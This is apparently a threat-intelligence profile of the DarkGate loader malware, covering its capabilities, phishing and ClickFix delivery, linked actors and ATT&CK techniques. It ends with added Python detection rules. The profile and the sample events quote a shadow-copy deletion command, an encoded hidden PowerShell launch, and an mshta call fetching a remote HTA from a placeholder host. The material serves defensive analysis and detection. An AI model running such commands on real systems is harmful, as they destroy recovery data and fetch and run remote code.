DarkGate
DarkGate is a commercial loader malware family with infostealing and post-compromise functionality. It can load and execute files in memory and includes capabilities such as HVNC, keylogging, information theft, privilege escalation, clipboard capture, and credential theft. On execution, DarkGate starts a thread that captures clipboard data and logs it to a predefined file. It searches for stored credentials associated with cryptocurrency wallets, notifies its command-and-control server when such credentials are identified, and the operator retrieves the captured wallet credentials over the existing C2 channel. Some versions use Nirsoft Network Password Recovery or NetPass to steal stored RDP credentials. DarkGate also queries system locale information during execution; later versions call GetSystemDefaultLCID to determine whether the malware is running in Russian-speaking countries. For defense evasion, it can terminate processes associated with several security software products. For impact and recovery inhibition, it can delete system restore points via "cmd.exe /c vssadmin delete shadows /for=c: /all /quiet". During initial installation, DarkGate drops several files into a hidden directory named after the victim machine.
Public reporting associates DarkGate primarily with phishing- and social-engineering-based delivery. Reported infection vectors include phishing emails with malicious attachments from spoofed senders, phishing links to VBS or MSI payloads requiring user interaction, pirated-media lures, malicious LNK-based delivery, and ClickFix or paste-and-run campaigns in which victims are tricked into copying and executing malicious PowerShell commands. A cited campaign used CVE-2024-21412 together with fake software installers impersonating Apple iTunes, Notion, NVIDIA, and others to bypass Microsoft Defender SmartScreen protections and infect users with DarkGate. The malware is also described as being distributed by TA571 and fake update activity sets, and as a payload used by UNC4393-linked access chains after the QAKBOT takedown. Reporting further notes DarkGate as a malware family observed in campaigns and distribution ecosystems involving Proofpoint-tracked ClickFix activity, phishing operations, and other malware delivery clusters.
Vulnerabilities exploited
1 CVE Mallory has correlated with this family across public research and vendor advisories. Each row links to the full Mallory page for that vulnerability.
CISA noted that the vulnerability can be chained with CVE-2024-21412 during attacks... “CVE-2024-21412 was used as part of a DarkGate campaign that leveraged fake software installers impersonating Apple’s iTunes, Notion, NVIDIA and more. Microsoft Defender SmartScreen is supposed to provide additional protections for end users against phishing and malicious websites. However, as the name implies, these flaws bypass these security features, which leads to end users being infected with malware.”
Groups observed using it
6 distinct threat actors attributed by public researchers. Open in Mallory to see the full evidence chain and overlapping campaigns.
In addition, TA571 has been associated with the distribution of other malware families, including variants of IcedID, NetSupportRAT, DarkGate and others.
In late 2023, several months after the QAKBOT infrastructure takedown by the FBI and the United States Justice Department, UNC4393 began leveraging other distribution clusters for initial access, specifically those delivering DARKGATE, again via phishing.
The attackers typically use targeted phishing emails with malicious files disguised as legitimate documents to gain initial access, and deploy backdoors such as BrockenDoor, as well as other malware including Remcos and DarkGate.
A DarkGate v6 sample delivered inside an IExpress self-extracting archive was fully unpacked through a five-layer decryption chain -- from IExpress cabinet to obfuscated batch script to AutoIt3 loader (2,462 encrypted strings) to RC4+LZNT1 payload decryption to process hollowing injection into explorer.exe.
These emails contained HTML attachments that attempted to install DarkGate, a commodity loader that is capable of keylogging, cryptocurrency mining, establishing C2 communications, and downloading additional malicious payloads, among others.
Techniques & procedures
28 distinct techniques documented for this family, organized by ATT&CK tactic.
Reconnaissance (1 technique)
Initial Access (2 techniques)
Execution (5 techniques)
We’ve been observing an initial access technique that tricks users into copying, pasting, and executing malicious PowerShell code... users are presented with the typical Verify You Are Human prompt... Clicking the button silently copies an obfuscated PowerShell command to the clipboard and presents the user with “Verification Steps” instructing them to: Press Windows Button + R... Press CTRL + V... Press Enter. | One technique we’ve recently seen lead to LummaC2 involves tricking users into copying a PowerShell script from a pop-up message, pasting it into the Windows Run dialogue box, and executing malicious PowerShell code.
The malicious PowerShell/CMD script is copied to the clipboard via browser-side JavaScript.
On Tuesday, the agency added CVE-2024-29988 to the list. The vulnerability was unveiled by Microsoft as part of the Patch Tuesday releases in April and affects Microsoft SmartScreen ... He added that the bug is popular among attackers that use a file download as part of their attack techniques for gaining initial access because they “want to find ways to bypass the security features such as SmartScreen.”
DarkHydrus has sent malware that required users to hit the enable button in Microsoft Excel to allow an .iqy file to be downloaded... TA505 has used lures to get users to enable content in malicious attachments and execute malicious files contained in archives.
Sandworm Team leveraged Microsoft Office attachments which contained malicious macros that were automatically executed once the user permitted them... APT29 has used various forms of spearphishing attempting to get a user to open attachments... DarkGate is distributed through phishing links to VBS or MSI objects requiring user interaction for execution.
Persistence (3 techniques)
Across public reporting, malware repeatedly 'adds Registry Run keys', 'creates Registry entries', 'modifies the Windows Registry', or 'overwrites registry keys' to maintain persistence.
Reporting repeatedly describes malware and threat actors establishing persistence by adding values under HKCU/HKLM\Software\Microsoft\Windows\CurrentVersion\Run or RunOnce, and by placing executables, scripts, or .lnk files in the Startup folder. Examples include malware copied to '%AppData%\Microsoft\Windows\Start Menu\Programs\Startup', creation of '.lnk' shortcuts in Startup, and scripts or batch files placed in Startup folders. Examples include: 'APT18 establishes persistence via the HKCU\Software\Microsoft\Windows\CurrentVersion\Run key'; 'APT28 has deployed malware that has copied itself to the startup directory for persistence'; 'FIN7 malware has created Registry Run and RunOnce keys to establish persistence, and has also added items to the Startup folder.'
Privilege Escalation (2 techniques)
Stealth (6 techniques)
Reporting contains many examples of base64, XOR, RC4, AES, Rijndael, custom ciphers, rolling XOR, and multi-layer obfuscation used to hide payloads, strings, scripts, and C2 data.
CVE-2024-21412 was used as part of a DarkGate campaign that leveraged fake software installers impersonating Apple’s iTunes, Notion, NVIDIA and more.
Reporting repeatedly describes malware and threat actors decoding, decrypting, deobfuscating, or unpacking payloads, strings, configuration data, commands, and C2 responses prior to execution or use.
An encoded PowerShell command then leverages Microsoft HTML Application Host (mshta.exe) to download and execute a malicious payload from a remote resource... Detection opportunity: mshta.exe utility making external network connections.
Several entries describe malware examining running processes to determine if a debugger, sandbox, virtual environment, or analysis/security tools are present, such as AsyncRAT checking for a debugger, RogueRobin enumerating Wireshark and Sysinternals processes, and P8RAT checking for processes associated with virtual environments.
Agent Tesla has created hidden folders. AppleJeus has added a leading . to plist filenames, unlisting them from the Finder app and default Terminal directory listings. APT28 has saved files with hidden file attributes. FIN13 has created hidden files and folders within a compromised Linux system /tmp directory and also used attrib.exe to hide gathered local host information.
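As an added example that is not part of the original page or of any vendor's rule set, the following Python code runs a small set of detection rules over constructed process-creation events for three behaviours described above: the vssadmin shadow-copy deletion, the ClickFix pattern of an encoded PowerShell command launched from the Run dialog (explorer.exe as parent), and mshta.exe fetching a remote HTA after being spawned by PowerShell. The pipe-separated key=value event format, the field names, and every sample value are assumptions; the explorer.exe-parent heuristic also fires on interactive use, so treat it as a triage signal rather than a verdict.

```python
import re

# Constructed process-creation events (not real telemetry); placeholder host/URL values.
SAMPLE_EVENTS = [
    r"ParentImage=C:\Windows\explorer.exe|Image=C:\Windows\System32\cmd.exe|CommandLine=cmd.exe /c vssadmin delete shadows /for=c: /all /quiet",
    r"ParentImage=C:\Windows\explorer.exe|Image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|CommandLine=powershell -w hidden -enc QUFBQQ==",
    r"ParentImage=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|Image=C:\Windows\System32\mshta.exe|CommandLine=mshta http://placeholder.invalid/stage.hta",
    r"ParentImage=C:\Windows\explorer.exe|Image=C:\Windows\System32\notepad.exe|CommandLine=notepad.exe C:\Users\alice\notes.txt",
    r"ParentImage=C:\Windows\System32\services.exe|Image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|CommandLine=powershell -File C:\scripts\backup.ps1",
]

# Matches the PowerShell -EncodedCommand switch and its accepted abbreviations.
ENCODED_FLAG = re.compile(r"(^|\s)-(e|ec|en|enc|encodedcommand)\s", re.I)


def parse_event(line):
    """Split one pipe-separated key=value line into a dict (split on the first '=' only)."""
    fields = {}
    for part in line.split("|"):
        key, _, value = part.partition("=")
        fields[key.strip()] = value.strip()
    return fields


def basename(path):
    """Return the lower-cased file name of a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()


def classify(event):
    """Return the list of rule names that fire for a parsed event."""
    parent = basename(event.get("ParentImage", ""))
    image = basename(event.get("Image", ""))
    cmd = event.get("CommandLine", "").lower()
    hits = []
    # Shadow-copy deletion as used by DarkGate for recovery inhibition.
    if "vssadmin" in cmd and re.search(r"delete\s+shadows", cmd):
        hits.append("shadow_copy_deletion")
    # ClickFix / paste-and-run: Run dialog (explorer.exe) launching encoded PowerShell.
    if image == "powershell.exe" and parent == "explorer.exe" and ENCODED_FLAG.search(cmd):
        hits.append("run_dialog_encoded_powershell")
    # PowerShell handing off to mshta.exe with a remote resource on the command line.
    if image == "mshta.exe" and parent == "powershell.exe" and re.search(r"https?://", cmd):
        hits.append("mshta_remote_hta_from_powershell")
    return hits


def scan(lines):
    """Return (original CommandLine, rule hits) for every event that matched a rule."""
    results = []
    for line in lines:
        event = parse_event(line)
        hits = classify(event)
        if hits:
            results.append((event["CommandLine"], hits))
    return results
```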
Defense Impairment (1 technique)
Credential Access (2 techniques)
DarkGate searches for stored credentials associated with cryptocurrency wallets... StrelaStealer attempts to identify and collect mail login data from Thunderbird and Outlook... Valak can download a module to search for and build a report of harvested credential data.
Discovery (4 techniques)
Reporting repeatedly describes malware and threat actors obtaining lists of running processes, using utilities such as tasklist, ps, WMI, Get-Process, CreateToolhelp32Snapshot, EnumProcesses, and similar APIs/commands to enumerate active processes on victim systems.
Reporting repeatedly describes malware and threat actors collecting host details such as OS version, hostname, architecture, CPU, memory, BIOS, domain, language, and other configuration data; e.g., "APT41 uses multiple built-in commands such as systeminfo and net config Workstation to enumerate victim system basic configuration information."
Reporting repeatedly describes malware and threat actors listing files and directories, enumerating drives, searching for files by extension/name/path, retrieving file metadata, and browsing file systems (for example: "APT28 has used Forfiles to locate PDF, Excel, and Word documents during collection" and "cmd can be used to find files and directories with native functionality such as dir commands").
Collection (3 techniques)
Agent Tesla can steal data from the victim’s clipboard. APT38 used a Trojan called KEYLIME to collect data from the clipboard. APT39 has used tools capable of stealing contents of the clipboard.
Agrius used a custom tool, sql.net4.exe, to query SQL databases and then identify and extract personally identifiable information... AppleSeed has automatically collected data from USB drives, keystrokes, and screen images before exfiltration... Ember Bear engages in mass collection from compromised systems during intrusions.
Command and Control (1 technique)
Exfiltration (1 technique)
ADVSTORESHELL exfiltrates data over the same channel used for C2... Agrius exfiltrated staged data using tools such as Putty and WinSCP, communicating with command and control servers... numerous malware and groups sent victim data, files, credentials, or host information over existing C2 channels.
IOCs tracked for this family
69 indicators attributed across vendor reports, sandbox runs, and researcher write-ups. Full values are available in Mallory.
Recent activity
137 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.
Referenced as a comparable loader family that uses AutoIt, RC4, RunPE hollowing, and ntdll restoration. In this content it serves as a comparison point for Eimeria’s architecture.
Malware used by BO Team as part of phishing-based operations to establish or expand access in victim environments.
Malware used in a staged, modular campaign where malicious Excel files fetched VBS or JS from public SMB shares, then executed commands to download PowerShell scripts and additional malware components including obfuscated shellcode and AutoHotKey-based executables.
DarkGate is described as a technically sophisticated MaaS malware that uses a multi-stage execution chain, anti-analysis checks, NTDLL unhooking, RC4+LZNT1 payload decryption, and process hollowing into explorer.exe or TapiUnattend.exe. In this sample it runs in-memory, performs HTTP-based C2 communication, and is configured for core C2 communication and credential theft.